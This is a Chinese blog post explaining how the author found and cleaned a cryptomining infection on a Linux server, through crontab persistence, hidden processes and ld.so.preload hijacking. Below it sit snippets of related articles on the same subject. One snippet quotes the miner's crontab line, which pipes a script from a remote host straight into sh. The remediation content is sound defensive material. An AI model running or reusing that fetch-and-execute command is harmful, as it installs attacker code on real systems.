linux 挖矿病毒清理

最新推荐文章于 2024-08-07 09:17:56 发布
最新推荐文章于 2024-08-07 09:17:56 发布
阅读量847 收藏 1
点赞数
分类专栏: 运维 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/volf420/article/details/121426838
版权

从11月6号开始,公司上网就经常断网,路由器的cpu使用率达到95%以上,大概2分钟一次。导致整个公司无法使用网络。在路由器上,能看到有一台linux的生产服务器的对外连接数达到35万以上。

进入这台服务器,网络连接上会出现一个连接到mcsv.net的getty的终端,通过iftop持续监控网络连接。每隔2分钟,会发起大量的网络连接与网络包。

通过搜索发现在应用目录下,多出一个.git的文件夹,进入此目录

获取当前机器所有账号,隐藏进程,crontab 每隔2分钟启动一次。

1、先把crontab中每隔2分钟的自动运行删除

2、查找所有隐藏进程 ps -aux --sort=-pcpu|head -10,并进行杀死

3、检查/etc/hosts 及/etc/resolv.conf文件,将里面多余的删除。

4、打开hideproc.sh文件,找到编译的dll,进行删除,同时清理 /etc/ld.so.preload文件中的内容

5、删除.git文件夹,打开防火墙,将需要对外的端口打开。

6、重启。

磐赢
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux清除木马minerd
骆驼大笨笨
08-02 9924
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
服务器(Linux挖矿木马病毒(kswapd0进程使cpu爆满)
热门推荐
小韩的博客
04-03 2万+
服务器(Linux挖矿木马病毒(kswapd0进程使cpu爆满)
linuxsys挖矿病毒处理
qq_24442273的博客
03-28 984
一、找出病毒 当发现服务器卡的时候,我们可以采用top命令,如下显示 image.png 我们注意看以上这几个进程,没稍加注意的话,我们还以为这几个是正常的进程,为啥呢? 1、毕竟这几个的user是apache、www、nobody,因为我的web站点,文件目录是www目录,所以这个地方很容易被误认为就是我们的站点目录,而且apache本来是web服务,它取成了这个名词,也容易混淆我们的视野。 2、后面的command名称取成了networkservice 和sysupdate,名称很像我们的系统进程, 3
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 1434
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
linux中了挖矿病毒详细解决方案
wu_qing_song的博客
10-27 5017
linux挖矿病毒已解决
Linux下清除挖矿病毒
QZ9420的博客
03-07 925
登录用户系统,显示系统被爆破了33万次了,结果用户的服务器密码改的很简单,极大可能是被爆破成功了。执行top命令,显示 kswapd0 的CPU占用异常。记下该进程ID 5081。这些都是和病毒后台下载运行有关的,按 insert 键,进入编辑模式,全部清空。执行查找命令 find / -name kswapd0。再按":“后,出现提示符”:" ,输入wq 然后回车保存。查看服务器的任务计划 crontab -e。杀掉进行 kill -9 5081。用 rm -rf 命令逐条删除。
linux挖矿检测脚本
07-25
执行自动检测
自动清理LINUX缓存工具
07-29
LINUX定时任务,检查LINUX缓存剩余空间,如果小于指定剩余空间,清理缓存防止服务因缓存资源不足导致进程退出。
linux 内存清理
02-28
linux 内存清理神器,经个人长期验证使用,没有问题,如果你面临linxu服务器内存时不时飙升,供尚用
linux自动清理日志脚本分享
09-15
### Linux自动清理日志脚本详解 #### 一、引言 在Linux环境中,日志文件对于系统管理和故障排查非常重要。然而,随着时间的推移,这些日志文件可能会占用大量的磁盘空间,尤其是在高流量的应用场景下。因此,定期...
linux下蠕虫清理
05-11
本篇将详细阐述如何检查Linux系统中的蠕虫病毒,进行清理,并探讨安全加固的方法,以防止未来再次受到攻击。 一、蠕虫病毒的检查 1. **日志分析**:首先,应查看系统日志,如`/var/log/auth.log`或`/var/log/...
linux系统中挖矿病毒
杭州吉网-运维日记
01-13 663
原创作者:运维工程师 谢晋 linux系统中挖矿病毒错误信息解决问题 错误信息 客户这边说某台虚拟机CPU突然暴增,用完了整个宿主机CPU资源 可以看到CPU使用确实很高 登录系统查看CPU使用情况 使用top查看CPU使用情况 # top 可以看到kdevtmpfsi进程,该进程明显是挖矿病毒进程 解决问题 如果直接kill掉kdevtmpfsi程序后续还会反复运行,所以要一次停掉他相关进程 打印出所有进程 # ps aux 可以看到kdevtmpfsi进程和他的守护进程kinsi
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3731
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子
nasen512的博客
07-10 2678
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子。
Linux挖矿病毒的清除与分析
for justice
10-14 3719
清除过程 确定病因 这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。 基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他。 使用命令: ps -aux | grep sysupdate 查看病毒的PID号。 为了获取绝对路径,使用: ls -l /proc/{pid号}/exe 发现sysupdate...
Linux服务器挖矿病毒彻底清除与防护实操指南
最新发布
boydoy1987的专栏
08-07 313
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
清除Linux挖矿病毒
三少
03-21 1999
今天上服务器发现特别卡,有点奇怪,也没安装什么软件,况且昨天还是好好的。 top一下,不看不知道,一看吓一跳,有几个莫名的进程,CPU达到了200%。 查了下资料,才发现是被人利用挖矿了。 不过不要急,先把相关进程kill掉 然后进/etc里面查看相关文件 大概就是networkservice,sysupdate,sysupdates,config.json,sysguard这几个 注意,先用c...
头疼的Linux挖矿病毒解决思路
jiohfgj的博客
06-24 5029
记一次Linux病毒解决 引言 伴随着服务器的使用,不可避免的会遇到一次中病毒的情况,如果没有花钱买备份的话,重装系统损失会重大,所以在次记录一次排查Linux病毒 1.病毒起因 主要原因可能是,在远程服务器开启远程调用的时候没有给redis设置密码,以及开放源为0.0.0.0/0,然后中招的挖矿病毒,主要幕后黑手有networkservice、sysguard、sysupdate 首先使用top命令查看进程cpu占用情况 确定是病毒存在无疑了 2.定位病毒 使用top命令得出进程号(PID) 我
Linux挖矿病毒入侵解决方式
我只不过想上天罢了的博客
06-19 1037
前段时间突然发现cpu一直飙满100%使用率,但是查看自己服务却没有发现占用,流量也在不断增加,chu无奈只能重启n次服务器尝试,无果。尝试网上搜索,无果。
linux挖矿病毒查杀
09-10
要查杀Linux挖矿病毒,首先需要识别病毒的特征。根据引用提供的信息,挖矿病毒Linux系统中的一个重要特征是CPU占用率非常高。然而,为了更好地隐藏自己,一些挖矿病毒会控制CPU的占用率,使其保持在50%以下,这可能导致传统的进程监控命令如top无法查看到高占用CPU的进程。因此,如果系统出现异常的CPU占用率,但是无法通过传统命令看到高占用CPU的进程,这可能是挖矿病毒的一种表现。引用 中提到的挖矿病毒还可能修改DNS记录,以防止病毒无法访问矿池或代理服务器。因此,检查"/etc/resolv.conf"文件的内容是否被修改也是一种查杀挖矿病毒的方法。如果发现DNS记录被修改,可以通过还原DNS记录来阻止挖矿病毒的连接。引用还提到,停止计划任务也是一种查杀挖矿病毒的措施。由于挖矿病毒通常会在系统启动时自动启动,可以检查计划任务以查看是否有可疑的任务,然后停止这些任务来阻止病毒的继续操作。综上所述,查杀Linux挖矿病毒的方法包括检查异常的CPU占用率、检查DNS记录是否被修改、停止计划任务等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值